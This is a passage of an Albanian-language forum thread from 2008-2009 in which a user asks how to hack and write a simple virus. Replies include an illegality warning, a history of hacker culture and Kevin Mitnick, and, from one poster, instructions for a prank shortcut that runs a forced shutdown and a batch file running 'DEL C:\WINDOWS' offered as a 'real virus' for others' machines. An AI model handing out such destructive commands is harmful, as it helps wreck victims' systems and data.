SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Faqja 1 e 3 1, 2, 3  Next

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė

SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga samoeni prej 2008-03-22, 11:17

SHOKE TE DASHUR

PIKE SE PARI JAM TIP QE JAM I DHENE SHUME PAS KOMPJUTERAVE PRA PAS TEKNOLOGJISE.DO ME PELQENETE TE DIJA DICKA RRETH HACKIMIT TE NJE SITI APO COFTE EDHE DICKA ELEMENTARE.PER TE THEN TE DREJTEN JAM I VETMI NE LAGJEN TIME QE NUK DI TE HACK-OJ DHE KJO ME BEN TE NDIHEM KEQ DISI.PASI TE GJITHE SHOKET E MI PERVEC ARSYES QE NUK ME TREGOJNE GJE ME SULMOI DHE SISTEMIN TIM QE UNE PATJETER NUK DI SE CFARE TE BEJ.DO DOJA TE DIJA DICKA SE SI MUND TE KRIJOSH NJE VIRUS APO SE SI MUND TE BEHEM NJE HACKER FILLESTAR,LE TA QUAJME KESHTU TE PAKTEN.


DO TE ME BENIT NJE NDER QE NUK KAM PER TA HARRUAR.JUA SIGUROI KETE

samoeni

Online
Offline

Numri i postimeve: 17
Registration date: 22/03/2008
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2880

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga NEO prej 2008-03-22, 11:45

pershendetje samoeni.

Ke nje deshire pak te cuditshme. Po gjithsesi jo te parealizueshme. Duhet te kesh parasysh qe nuk ekziston asnje literature apo informacion i detajuar per kete qe kerkon. gjithcka ecen ne baze te eksperiencesh qe mund te fitosh. Pastaj duhet tekesh parasysh qe te besh hacking eshte e jashtligjshme, dhe per me teper nese nuk je i shkathet mund te diktohesh dhe mund te kesh probleme te medha. Sot perdite e me shume po behet e veshtire te hackosh duke filluar nga msn e deri tek llogarite e perdoruesve apo administratorve te forumeve apo websiteve. zakonisht sulme te tilla ndodhin nga nje grup personash dhe jo nga 1 i vetem.

NEO
Ekspert
Ekspert

Online
Offline

Male
Numri i postimeve: 3340
Age: 32
Vendodhja: Tirane
Koha e lire: Vetem naten kur fle
Puna: Minister
Registration date: 28/06/2007
<b>Popullariteti </b> Popullariteti : 205
<b>Kredite</b> Kredite: 6601

Shiko profilin e anėtarit http://www.hapsirajuaj.com

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga samoeni prej 2008-03-22, 12:45

PO SI A NUK KA NDONJE MENYRE PER MESU DISA GJONA SHUME FILLESTARE??????P.SH SI MUND TE KRIJOJ NJE VIRUS TE THJESHTE??KJO SA PER KURIOZITET SE NUK KAM QELLIME SULMI

samoeni

Online
Offline

Numri i postimeve: 17
Registration date: 22/03/2008
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2880

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga NEO prej 2008-03-22, 12:54

Per te krijuar nje virus , sado i thjeshte apo i veshtire te jete, pike se pari duhet te njohesh gjuhen e programimit, si dhe te kesh nje seri programesh si C++, Javascript etj. Kur them te njohesh gjuhen ekam fjalen te programosh ne baze te qellimit qe ke. Virusi eshte nje sistem kodesh dhe komandash qe hyne ne funksionim kur ky file aktivizohet ose hyn ne veprim. Une ne fakt nuk programuar ndonjehere file te tille, por kur me jane dashur i kam marre ato neper forume ku diskutohet per keto gjera.

NEO
Ekspert
Ekspert

Online
Offline

Male
Numri i postimeve: 3340
Age: 32
Vendodhja: Tirane
Koha e lire: Vetem naten kur fle
Puna: Minister
Registration date: 28/06/2007
<b>Popullariteti </b> Popullariteti : 205
<b>Kredite</b> Kredite: 6601

Shiko profilin e anėtarit http://www.hapsirajuaj.com

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga samoeni prej 2008-03-22, 13:00

PO TASHI UNE E PROVOVA NE BAZE TE DIJES QE KAM,LE TE QUAJME KESHTU.U FUTA NE C:/COMMAND PROMPT DHE SHKRUAJTA
C:/EDIT TROJAN.BAT DHE NE ATO CASTE MU SHFAQ NJE EKRAN NE NGJYRE BLU.PRA AJO E COMMAND PROMT.POR PUNA ESHTE SE NUK DI CA TE SHKRUAJ

samoeni

Online
Offline

Numri i postimeve: 17
Registration date: 22/03/2008
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2880

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga supervizor prej 2008-03-23, 20:04

@samoeni shkruajti:SHOKE TE DASHUR

PIKE SE PARI JAM TIP QE JAM I DHENE SHUME PAS KOMPJUTERAVE PRA PAS TEKNOLOGJISE.DO ME PELQENETE TE DIJA DICKA RRETH HACKIMIT TE NJE SITI APO COFTE EDHE DICKA ELEMENTARE.PER TE THEN TE DREJTEN JAM I VETMI NE LAGJEN TIME QE NUK DI TE HACK-OJ DHE KJO ME BEN TE NDIHEM KEQ DISI.PASI TE GJITHE SHOKET E MI PERVEC ARSYES QE NUK ME TREGOJNE GJE ME SULMOI DHE SISTEMIN TIM QE UNE PATJETER NUK DI SE CFARE TE BEJ.DO DOJA TE DIJA DICKA SE SI MUND TE KRIJOSH NJE VIRUS APO SE SI MUND TE BEHEM NJE HACKER FILLESTAR,LE TA QUAJME KESHTU TE PAKTEN.


DO TE ME BENIT NJE NDER QE NUK KAM PER TA HARRUAR.JUA SIGUROI KETE

Ne ckuptim te kane sulmuar sistemin tend???

supervizor

Online
Offline

Numri i postimeve: 16
Registration date: 09/12/2007
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2984

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga prikeni prej 2009-02-27, 17:41

Hackerat e pare:
Origjina e kultures hacking mund te shkoje shume larg, deri ne 1961, viti kur MIT perfitoi PDP-1 .
Grupi i Signals and Power e Club Tech Model Railroad e MIT kishte
arritur te modifikonte lojra elektronike duke zbuluar disa strumente
programimi dhe gjuhe programimi. Per kete eshte folur dhe ne librin
pare per hacking e shkruar nga Steven Levy (Anchor/Doubleday, 1984).
Kultura e Mit ka qene e para qe ka futur ne informatike termin ?
hacking?. Hackerat e TMRC krijuan Artificial Intelligenge Laboratory
(laboratorin e inteligjences artificiale), qendra kryesore e kerkimit
AI (inteligjences artificiale) ne shkallen boterore ne vitet e para 80.
Ndikimi i tyre u rrit me shume ne 1969 kur u krijua ARPAnet.
ARPAnet ishte rrjeti I pare nderkontinentale me kompjutera mjaft te
shpejte dhe e ideuara nga ministria e mbrojtjes amerikane si nje
eksperiment per komunikimin dixhital , u krijua per here te pare nje
rrjet aq I madh kopjuterash te lidhur me njeri-tjetrin. Ky rrjet I
lejoji shume personave te komunikonnin dhe te shkenbenin informacione
me nje shpejtesi shume te madhe. ARPAnet beri te mundur qe hackerat e
pare te komunikonin me njeri-tjetrin neper koridoret elektronike te
atij rrjeti te shkelqyer. Keshtu qe vete kultura hacker u zgjerua shume
dhe krijoji nje zone te vetme ne rrjetin e siperfolur. Ne kete menyre
hackerimet e para te kompjuterave, batutat e para, gjuhet e para te
programimit dhe diskutimet per etiken hacker u perhapen ne ARPAnet.
Kultura hacker beri hapat e para ne universitetet amerikane dhe sidomos
ne ato dege qe merreshin me shkencat informatike. Perhapja dhe
zhvillimi metej I kultures hacking ndodhi me futjen e minikompjuterave
ose DEC kjo beri nje revolucion ne zhvillimin e metejshem te rrjetit.
Nder kopjuterat DEC qe mbahet mend me nostagji ishte e PDP-10 qe u
shfaq per here te pare me 1967 ky kompjuter u be nder me te preferuarit
e kultures hacking. TOPS-10 sistemi operativ dhe asemblatori MACRO-10
nder ato software te cilet mbeten nder me te preferuarit e per 15 vjet
nga kultura hacking. Pas PDP-10 vjen nje system tjeter me emrin ITS
(incompatible time-sharing system) ky sistem u perdor per nje kohe
shume te gjate dhe ishte plot bugs ose probleme qe I bene hackerat ta
manipulonin si te donin. Ky system ishte programuar ne nje gjuhe te
quajtur LISP te perdorur edhe sot ne ditet tona vete ky system
programimi I hapi rrugen hackerave qe te programonin aplikacione mjaft
te arritura. Nje tjeter system I shkelqyer u programua gjate ketyre
viteve ne New Jersy nga nje hacker Ken Thompson I cili filloi te merrej
me nje system I cili te lejonte perdoruesve te kishin nje game veprimi
me te gjere dhe te kontrollonin kompjuterin e tyre si te donin ndryshe
nga sistemet e tjera te cila ishin krejt te padukshem. Nje tjeter
hacker Denis Ritchie programoi nje gjuhe e quajtur C e ngjashme me unix
dhe me nje fleksibilitet mjaft te larte dhe te mbeshtetur ne nje sistem
unix . Thompson dhe Ritchie u thirren nga BELL per te ndertuar nje
sistem office-automation por keto te dy kishin ne mendje nje gje tjeter
krijimin e sistemi te programuar nen C. Ky qe nje revolucion I madh
sepse nje sistem I tille ishte ne gjendje ti ofronte perdorueseve nje
mundesi per te bere vete programe dhe tani vete hackerat mund te
perdornin te njejtet programe ne disa sisteme opererative. E mira e
unix dhe sidomos C ishte se ndryshe nga gjuhet e programimit te
meparshme strukturat e C mund te mbaheshin mend dhe jo te perdoreshin
manuale per te programuar. Kompjuterat e perdorura per hacking ishin
PDP-11 dhe me pas VAX. Vete sistemi unix ishte aq I pershtatshem sa nuk
kishte nevoje per tu rikonfiguruar per te hyre ne nje rrjet ARPAnet.
Normalisht liria e programimit qe kishte vete sistemi sollen qe shume
hacker te zhvillohen mbrenda kesaj structure te shkelqyer. Gjate viteve
80 vete sistemet e tjera uzhduken me ngadale dhe ne fuqi erdhi VAX dhe
unix qe ishin sistemet e parapelqyera nga hackerat. Ne keto vite u
publikua libri Hackers nga Levy I ndihmuar nga programatori I emacs
Richard M. Stallman I cili beri programet e para falas me nje kualitet
te larte dhe krijoji Free Software Foundation. Levy e quajti hackeri I
fundit I vertete per fat te mire ai gaboi. ?????.. Vazhdon ne numrin
tjeter.
Hackeri me i madh :
Kevin Mitnik eshte hackeri me i madh i te gjitha kohorave. Kevin ka
lindur ne Amerike, Kaliforni. Prinderit e tij divorcohen kur ai ishte
vetem 3-vjec. Ai qe ne moshen 13 - vjec mblidhte hardware dhe bente
shpikje ne dhomen e tij te mbyllur. Ja kur ai zbuloi kompjuterin dhe
filloi te jete nje fantazem ne rrjet. Ne moshen 17 -vjec ai u
perjashtua nga shkolla sepse merrte te dhena nga insitutet e tjera dhe
ndryshonte ato. Po ne kete moshe ai arrestohet per here te pare sepse
kishte vjedhur burime informacioni , libra informatike etj duke i
kthyer perseri. Ai keto informacione i merrte dhe i kopjonte, pa i
prishur dhe pa i shitur. Pati edhe arrestime te tjera ne vitin 83, 87
dhe 88.Nickname i tij ishte CONDOR. Kevin rritet dhe behet me shume
CONDOR. Ai ka ne dore plane biznesi dhe informacione sekrete.Leviz ne
te gjithe Ameriken, martohet shume shpesh dhe ndryshonte numra telefoni
per mos tu kapur. Tenefonin e tij e kishte te modifikuar dhe arrinte te
degjonte telefonatat perreth. I rritej inati per kompanite e medha si
"IBM Digital Microsystem, Fujitsu". Kevin donte liri informacioni,
perdorim falas por mbi te gjitha ai donte problemet e produkteve te
kompanive te ashtuquajtura bugs. Gjate viteve 90 Kevin rritet me shume.
Ai eshte shume i terhequr nga sistemi "VAX" e Digital: jane te vetmit
qe nuk kane bugs. Por ja kur hyne ne loje Kevin Mitnik. Ai perdor
Social Engineering, nje teknike hacking per te genjyer telefonata duke
u hequr si nje person tjeter. Kevin merr informacionin e deshiruar.
Bug-set ndodhen dhe i gjen ky njeri,Kevin Mitnik. Ai spiunon e-mailet e
tyre.Kevin gjen sekretet me sekrete te Digital. FBI eshte ne hapat e
tij. Ai e di. Ndryshon apartamente,degjon telefonata dhe shume shpesh
tallet me FBI. Kevin tani ne listen e tyre eshte ?Top Wanted?, me i
kerkuari. Fillon lufta. Nje dite ne kompjuterin e Shimomures afishohet
nje mesazh:" Found me: I am on the Net" "Me gjeni mua,jam ne rrjet."
Sfida ka filluar. Per here te pare nuk perdoren arme por njohurite
kompjuterike. Kevin ishte nder te paret qe kishte perdorur ipspoofing.
Shimomura ishte i Sigurise Kombetare Amerikane Informatike. Ai ishte
nje mjeshter ne profesionin e tij. Kevin nuk ndjehet i sigurte, fillon
te tronditet. Ne gazeta flitet vetem per te.Gazetaret ne temat e tyre
per te e pershkruajne si nje kriminel.Kevin filloi te bej gabime, ai
bisedonte me njerez qe nuk duhet te kishte biseduar. Ja kur vjen dhe
tradhetimi pas bisedimit me Markoff. Ai i tregon Shimomures per
vendbanimin e Mitnik. Ky i fundit rrefen tek FBI.Ketu vjen dhe fundi i
Kevinit. Pas kapjes se tij , Shimomura dhe Markoff botuan librin e tyre
qe bente fjale per ndjekjen e tyre te CONDORIT (Kevin Mitnik) .
Sigurisht ata i dhane dhe te drejten qe libri te behej film. Nje nga
keto filma eshte dhe "Take Down". Tani kthehemi ne daten 14 shkurt 1995
kur Kevin arrestohet. Djali qe donte nje "Cyber-World" falas dhe liri
informacioni eshte arrestuar. Ne vitin 2000 ai eshte leshuar dhe tani
eshte nje administrator i nje faqje amerikane.

prikeni
pc + pc = shejtan
pc + pc = shejtan

Online
Offline

Male
Numri i postimeve: 60
Vendodhja: atje ku kam qen
Koha e lire: ateje ku me pelqen
Puna: paradite bushim ,mbazdite pa pun..
Registration date: 28/03/2008
<b>Popullariteti </b> Popullariteti : 15
<b>Kredite</b> Kredite: 2892

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga DJ DUPSI prej 2009-06-21, 20:45

samoen

Do te te tregoj si te krijosh nje trojan qe fik kompjuterin.

1.Ne fillim ne desktop kliko me te djathten dhe zgjidh NEW.
2.Me pas zgjidh SHORTCUT.
3.Do te dali nje tabele dhe ti do te shkruash shutdown -s -t 15 -c "Trojan Horse Activated"
4.Kliko NEXT.
5.Zgjidh emrin qe do t'i vesh.
6.Kliko FINISH.

Por neqofteje do ta hapesh per ta provuar ne fillim zbato keto hapa:

1.Ne fillim ne desktop kliko me te djathten dhe zgjidh NEW.
2.Me pas zgjidh SHORTCUT.
3.Do te dali nje tabele dhe ti do te shkruash shutdown -a
4.Kliko NEXT.
5.Zgjidh emrin qe do t'i vesh.
6.Kliko FINISH.

DJ DUPSI

Online
Offline

Male
Numri i postimeve: 4
Age: 26
Vendodhja: Albania
Registration date: 21/06/2009
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2431

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga lorenc prej 2009-06-22, 14:07

hheeeeeeejjjjj dj pershendetje mund te ma shpjegosh pak ket shutdown -s -t 15 -c "Trojan Horse Activated"nqs ke munci flm

lorenc

Online
Offline

Male
Numri i postimeve: 390
Age: 23
Vendodhja: lezhe
Koha e lire: intenet
Puna: paradite rri masdite pushoj
Registration date: 10/12/2008
<b>Popullariteti </b> Popullariteti : 1
<b>Kredite</b> Kredite: 3048

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga DJ DUPSI prej 2009-06-29, 16:27

shutdown -s -t 15 -c "Trojan Horse Activated" eshte kodi

shutdown -s -t perfaqson fikjen 15 eshte koha ne sekonda kurse fjalet ne thonjza perfaqsojne komentin qe do te dali

DJ DUPSI

Online
Offline

Male
Numri i postimeve: 4
Age: 26
Vendodhja: Albania
Registration date: 21/06/2009
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2431

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga lorenc prej 2009-06-30, 11:14

ku nuk ishte virus ishte thjesh nje komand automatike per fikjen e kompjuterit Trojan Horse Activated ky eshte emer virusi po nuk esht virus ne ket komande qe ti ke dhen

lorenc

Online
Offline

Male
Numri i postimeve: 390
Age: 23
Vendodhja: lezhe
Koha e lire: intenet
Puna: paradite rri masdite pushoj
Registration date: 10/12/2008
<b>Popullariteti </b> Popullariteti : 1
<b>Kredite</b> Kredite: 3048

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Re: SI MUND TE BEHEM NJE HACK-ER PAK A SHUME I ZOTI?

Mesazh nga DJ DUPSI prej 2009-07-27, 00:04

lorenc

Ke te drejte por neqoftese do nje virus te vertete me ndiq.
Hap notepad dhe shkruaj
@ECHO OFF
DEL C:\WINDOWS

Me pas ruaje me cfare emri te duash dhe ne fund ve prapashtesen .bat dhe zgjidh opsionin all files
POR MBAJ MEND MOS E HAP NE KOMPJUTERIN TEND!!!!!!!!!!!!!!!!!!!!!!!

NJE KESHILLE : MOS PERDOR ANTIVIRUS MCAFEE OSE NORTON POR AVG FREE EDITION 8.5

DJ DUPSI

Online
Offline

Male
Numri i postimeve: 4
Age: 26
Vendodhja: Albania
Registration date: 21/06/2009
<b>Popullariteti </b> Popullariteti : 0
<b>Kredite</b> Kredite: 2431

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Faqja 1 e 3 1, 2, 3  Next

Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi